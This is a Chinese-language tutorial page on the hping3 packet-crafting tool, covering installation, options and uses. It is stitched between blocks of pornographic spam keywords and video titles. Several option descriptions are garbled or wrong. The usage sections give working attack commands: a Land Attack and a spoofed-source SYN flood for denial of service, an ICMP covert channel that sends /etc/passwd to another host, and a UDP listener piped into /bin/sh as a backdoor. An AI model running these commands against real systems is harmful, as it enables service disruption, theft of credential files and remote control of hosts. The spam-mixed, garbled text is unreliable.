欧美激情aaaa_伊人久久久大香线蕉综合直播_日韩在线卡一卡二_亚洲成人人体

hping3

測試網絡及主機的安全

補充說明

hping 是用于生成和解析TCPIP協議數據包的開源工具。創作者是Salvatore Sanfilippo。目前最新版是hping3,支持使用tcl腳本自動化地調用其API。hping是安全審計、防火墻測試等工作的標配工具。hping優勢在于能夠定制數據包的各個部分,因此用戶可以靈活對目標機進行細致地探測。

安裝

yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install

選項

-H --help 顯示幫助。
-v -VERSION 版本信息。
-c --count count 發送數據包的次數 關于countreached_timeout 可以在hping2.h里編輯。
-i --interval 包發送間隔時間(單位是毫秒)缺省時間是1秒,此功能在增加傳輸率上很重要,在idle/spoofing掃描時此功能也會被用到,你可以參考hping-howto獲得更多信息-fast 每秒發10個數據包。
-n -nmeric 數字輸出,象征性輸出主機地址。
-q -quiet 退出。
-I --interface interface name 無非就是eth0之類的參數。
-v --verbose 顯示很多信息,TCP回應一般如:len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug 進入debug模式當你遇到麻煩時,比如用HPING遇到一些不合你習慣的時候,你可以用此模式修改HPING,(INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......)
-z --bind 快捷鍵的使用。
-Z --unbind 消除快捷鍵。
-O --rawip RAWIP模式,在此模式下HPING會發送帶數據的IP頭。
-1 --icmp ICMP模式,此模式下HPING會發送IGMP應答報,你可以用--ICMPTYPE --ICMPCODE選項發送其他類型/模式的ICMP報文。
-2 --udp UDP 模式,缺省下,HPING會發送UDP報文到主機的0端口,你可以用--baseport --destport --keep選項指定其模式。
-9 --listen signatuer hping的listen模式,用此模式,HPING會接收指定的數據。
-a --spoof hostname 偽造IP攻擊,防火墻就不會記錄你的真實IP了,當然回應的包你也接收不到了。
-t --ttl time to live 可以指定發出包的TTL值。
-H --ipproto 在RAW IP模式里選擇IP協議。
-w --WINID UNIX ,WINDIWS的id回應不同的,這選項可以讓你的ID回應和WINDOWS一樣。
-r --rel 更改ID的,可以讓ID曾遞減輸出,詳見HPING-HOWTO。
-F --FRAG 更改包的FRAG,這可以測試對方對于包碎片的處理能力,缺省的“virtual mtu”是16字節。
-x --morefrag 此功能可以發送碎片使主機忙于恢復碎片而造成主機的拒絕服務。
-y -dontfrag 發送不可恢復的IP碎片,這可以讓你了解更多的MTU PATH DISCOVERY。
-G --fragoff fragment offset value set the fragment offset
-m --mtu mtu value 用此項后ID數值變得很大,50000沒指定此項時3000-20000左右。
-G --rroute 記錄路由,可以看到詳悉的數據等等,最多可以經過9個路由,即使主機屏蔽了ICMP報文。
-C --ICMPTYPE type 指定ICMP類型,缺省是ICMP echo REQUEST。
-K --ICMPCODE CODE 指定ICMP代號,缺省0。
--icmp-ipver 把IP版本也插入IP頭。
--icmp-iphlen 設置IP頭的長度,缺省為5(32字節)。
--icmp-iplen 設置IP包長度。
--icmp-ipid 設置ICMP報文IP頭的ID,缺省是RANDOM。
--icmp-ipproto 設置協議的,缺省是TCP。
-icmp-cksum 設置校驗和。
-icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s --baseport source port hping 用源端口猜測回應的包,它從一個基本端口計數,每收一個包,端口也加1,這規則你可以自己定義。
-p --deskport [+][+]desk port 設置目標端口,缺省為0,一個加號設置為:每發送一個請求包到達后,端口加1,兩個加號為:每發一個包,端口數加1。
--keep 上面說過了。
-w --win 發的大小和windows一樣大,64BYTE。
-O --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.
-m --tcpseq 設置TCP序列數。
-l --tcpck 設置TCP ack。
-Q --seqnum 搜集序列號的,這對于你分析TCP序列號有很大作用。

Hping3功能

Hping3主要有以下典型功能應用:

# ?防火墻測試

使用Hping3指定各種數據包字段,依次對防火墻進行詳細測試。請參考:http://0daysecurity.com/articles/hping3_examples.html

測試防火墻對ICMP包的反應、是否支持traceroute、是否開放某個端口、對防火墻進行拒絕服務攻擊(DoS attack)。例如,以LandAttack方式測試目標防火墻(Land Attack是將發送源地址設置為與目標地址相同,誘使目標機與自己不停地建立連接)。

hping3 -S  -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

# 端口掃描

Hping3也可以對目標端口進行掃描。Hping3支持指定TCP各個標志位、長度等信息。以下示例可用于探測目標機的80端口是否開放:

hping3 -I eth0  -S 192.168.10.1 -p 80

其中-I eth0指定使用eth0端口,-S指定TCP包的標志位SYN,-p 80指定探測的目的端口。

hping3支持非常豐富的端口探測方式,nmap擁有的掃描方式hping3幾乎都支持(除開connect方式,因為Hping3僅發送與接收包,不會維護連接,所以不支持connect方式探測)。而且Hping3能夠對發送的探測進行更加精細的控制,方便用戶微調探測結果。當然,Hping3的端口掃描性能及綜合處理能力,無法與Nmap相比。一般使用它僅對少量主機的少量端口進行掃描。

# Idle掃描

Idle掃描(Idle Scanning)是一種匿名掃描遠程主機的方式,該方式也是有Hping3的作者Salvatore Sanfilippo發明的,目前Idle掃描在Nmap中也有實現。

該掃描原理是:尋找一臺idle主機(該主機沒有任何的網絡流量,并且IPID是逐個增長的),攻擊端主機先向idle主機發送探測包,從回復包中獲取其IPID。冒充idle主機的IP地址向遠程主機的端口發送SYN包(此處假設為SYN包),此時如果遠程主機的目的端口開放,那么會回復SYN/ACK,此時idle主機收到SYN/ACK后回復RST包。然后攻擊端主機再向idle主機發送探測包,獲取其IPID。那么對比兩次的IPID值,我們就可以判斷遠程主機是否回復了數據包,從而間接地推測其端口狀態。

# 拒絕服務攻擊

使用Hping3可以很方便構建拒絕服務攻擊。比如對目標機發起大量SYN連接,偽造源地址為192.168.10.99,并使用1000微秒的間隔發送各個SYN包。

hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

其他攻擊如smurf、teardrop、land attack等也很容易構建出來。

# 文件傳輸

Hping3支持通過TCP/UDP/ICMP等包來進行文件傳輸。相當于借助TCP/UDP/ICMP包建立隱秘隧道通訊。實現方式是開啟監聽端口,對檢測到的簽名(簽名為用戶指定的字符串)的內容進行相應的解析。在接收端開啟服務:

hping3 192.168.1.159--listen signature --safe  --icmp

監聽ICMP包中的簽名,根據簽名解析出文件內容。

在發送端使用簽名打包的ICMP包發送文件:

hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd

/etc/passwd密碼文件通過ICMP包傳給192.168.10.44主機。發送包大小為100字節(-d 100),發送簽名為signature(-sign signature)。

# 木馬功能

如果Hping3能夠在遠程主機上啟動,那么可以作為木馬程序啟動監聽端口,并在建立連接后打開shell通信。與netcat的后門功能類似。

示例:本地打開53號UDP端口(DNS解析服務)監聽來自192.168.10.66主機的包含簽名為signature的數據包,并將收到的數據調用/bin/sh執行。

在木馬啟動端:

hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh

在遠程控制端:

echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

將包含ls命令的文件加上簽名signature發送到192.168.10.44主機的53號UDP端口,包數據長度為100字節。

當然這里只是簡單的演示程序,真實的場景,控制端可以利益shell執行很多的高級復雜的操作。

欧美激情aaaa_伊人久久久大香线蕉综合直播_日韩在线卡一卡二_亚洲成人人体
夜夜精品视频一区二区| 成人精品一区二区三区中文字幕| 精品国产青草久久久久福利| 国产精品久久午夜夜伦鲁鲁| 中文字幕久久午夜不卡| 亚洲女同ⅹxx女同tv| 亚洲日本青草视频在线怡红院| 日韩一区日韩二区| 国模冰冰炮一区二区| 欧美精品自拍偷拍动漫精品| 欧美久久久久久久久中文字幕| 欧美日韩高清不卡| 亚洲日本va午夜在线影院| 国产在线视视频有精品| 日韩一区二区免费视频| 久久在线观看免费| 蜜臀a∨国产成人精品| 欧美日本一道本| 亚洲第一电影网| 国产一区在线精品| 日韩精品一区二区三区视频播放 | 精品视频在线看| 国产嫩草影院久久久久| 激情综合网激情| 精品国产乱码久久| 久久激情五月激情| 精品裸体舞一区二区三区| 国产精品久久久久久久久久久免费看| 有码一区二区三区| 麻豆91小视频| 日韩欧美国产一区二区三区 | 久久综合国产精品| 亚洲欧洲日韩av| 日本欧美大码aⅴ在线播放| 欧美日韩精品欧美日韩精品| 欧美mv和日韩mv的网站| 狠狠色丁香久久婷婷综合丁香| www.日韩在线| 亚洲精品视频一区| 欧美日韩一区二区三区在线| 性欧美疯狂xxxxbbbb| 日韩欧美另类在线| 亚洲精品免费在线播放| 国产美女娇喘av呻吟久久| 欧美三级日本三级少妇99| 五月婷婷综合网| 欧美不卡一二三| 国产91丝袜在线观看| 中文字幕一区二区三区精华液 | 国产日韩欧美亚洲| 成人av网站在线| 一区二区三区免费观看| 91麻豆精品国产91久久久| 麻豆成人免费电影| 国产精品伦理在线| 韩国视频一区二区| 中文字幕一区二区在线观看| 欧美色大人视频| 久久99久久精品| 亚洲天堂免费看| 欧美精品v国产精品v日韩精品| 中文字幕永久在线不卡| 国产麻豆精品在线| 亚洲精品一卡二卡| 精品电影一区二区三区 | 91在线小视频| 亚洲成在线观看| 精品sm在线观看| 欧美亚洲动漫制服丝袜| 蜜臀久久久久久久| 欧美精三区欧美精三区| 国产乱人伦偷精品视频免下载 | 欧美三级中文字幕在线观看| 蜜臀av在线播放一区二区三区| 欧美三区在线视频| 丁香婷婷综合色啪| 亚洲成人在线免费| 国产精品不卡视频| 92国产精品观看| 国产一区二区按摩在线观看| 亚洲成av人片www| 中文子幕无线码一区tr| 日韩一区二区精品葵司在线 | 男女性色大片免费观看一区二区| 9191成人精品久久| 日本不卡1234视频| 亚洲综合另类小说| 中文字幕日韩av资源站| 色综合久久久网| 一区二区三区久久久| 国产日韩欧美一区二区三区乱码 | 欧美亚一区二区| 日韩黄色小视频| 亚洲五码中文字幕| 777奇米成人网| 欧美艳星brazzers| caoporn国产精品| 国产99久久精品| 国产美女一区二区三区| 综合久久久久久| 欧美人伦禁忌dvd放荡欲情| 色综合中文综合网| 中文字幕一区日韩精品欧美| 一本大道久久a久久精品综合| 一区二区三区精品在线| 中文字幕一区二区三区四区不卡 | 理论电影国产精品| 久久美女艺术照精彩视频福利播放| 粉嫩av一区二区三区在线播放| 亚洲免费观看高清完整| 欧美高清一级片在线观看| 国产亚洲精品bt天堂精选| 欧美亚洲动漫精品| 欧美性生活一区| 色综合久久六月婷婷中文字幕| 日韩高清一区在线| 久久久精品tv| 欧美日韩国产精品自在自线| 欧洲精品视频在线观看| 欧美日韩日日摸| 国产大片一区二区| 国产精品一级片在线观看| 成人综合在线网站| aa级大片欧美| 国产一区二区女| 成人av网站在线观看免费| 色婷婷久久久综合中文字幕| 国内成人自拍视频| 成人免费观看av| 91九色最新地址| 日韩一区二区免费在线电影 | 91蝌蚪porny九色| 在线精品视频免费观看| 国产乱对白刺激视频不卡| 国产福利视频一区二区三区| 白白色 亚洲乱淫| 在线视频中文字幕一区二区| 欧美一区二区三区影视| 久久精品一级爱片| 亚洲乱码国产乱码精品精小说| 2024国产精品| 自拍偷拍亚洲综合| 午夜视频一区二区三区| 国产电影一区二区三区| 日本韩国欧美国产| 日韩精品一区二区在线| 欧美一区二区三区婷婷月色| 国产欧美一区二区三区网站| 一区二区三区欧美在线观看| 激情综合网天天干| 欧美在线三级电影| 久久先锋资源网| 亚洲国产一区二区三区青草影视| 亚洲欧美激情插| 激情综合一区二区三区| 91小视频在线| 精品久久久三级丝袜| 精品日产卡一卡二卡麻豆| 91精品国产综合久久久久久久| 欧美日韩国产高清一区二区三区| 一本色道**综合亚洲精品蜜桃冫| 91色九色蝌蚪| 精品国产乱码久久久久久久| 亚洲美女淫视频| 亚洲一二三区在线观看| 视频在线观看一区| 日本va欧美va瓶| 在线观看欧美黄色| 国产精品久久国产精麻豆99网站| 国产精品丝袜久久久久久app| 国产精品女主播av| 综合久久久久久久| 国产精品资源网| 日韩一区二区三区高清免费看看| 欧美刺激午夜性久久久久久久| 日韩一区二区三区视频| 久久综合九色综合久久久精品综合 | 亚洲一区二区三区激情| 成人性生交大片免费看视频在线| 成人av动漫在线| 欧美mv和日韩mv国产网站| 午夜精品久久久久| 欧美性极品少妇| 日韩精品一区国产麻豆| 日韩专区中文字幕一区二区| 欧美亚洲综合色| 中文字幕在线免费不卡| 国产成人午夜高潮毛片| 91久久香蕉国产日韩欧美9色| 日韩西西人体444www| 亚洲v日本v欧美v久久精品| 蜜臀91精品一区二区三区| 欧美精品久久一区| 亚洲va欧美va天堂v国产综合| 黑人巨大精品欧美黑白配亚洲| 99久久99久久久精品齐齐| 欧美视频日韩视频| 亚洲国产成人精品视频| 欧美日韩黄视频| 视频在线观看国产精品|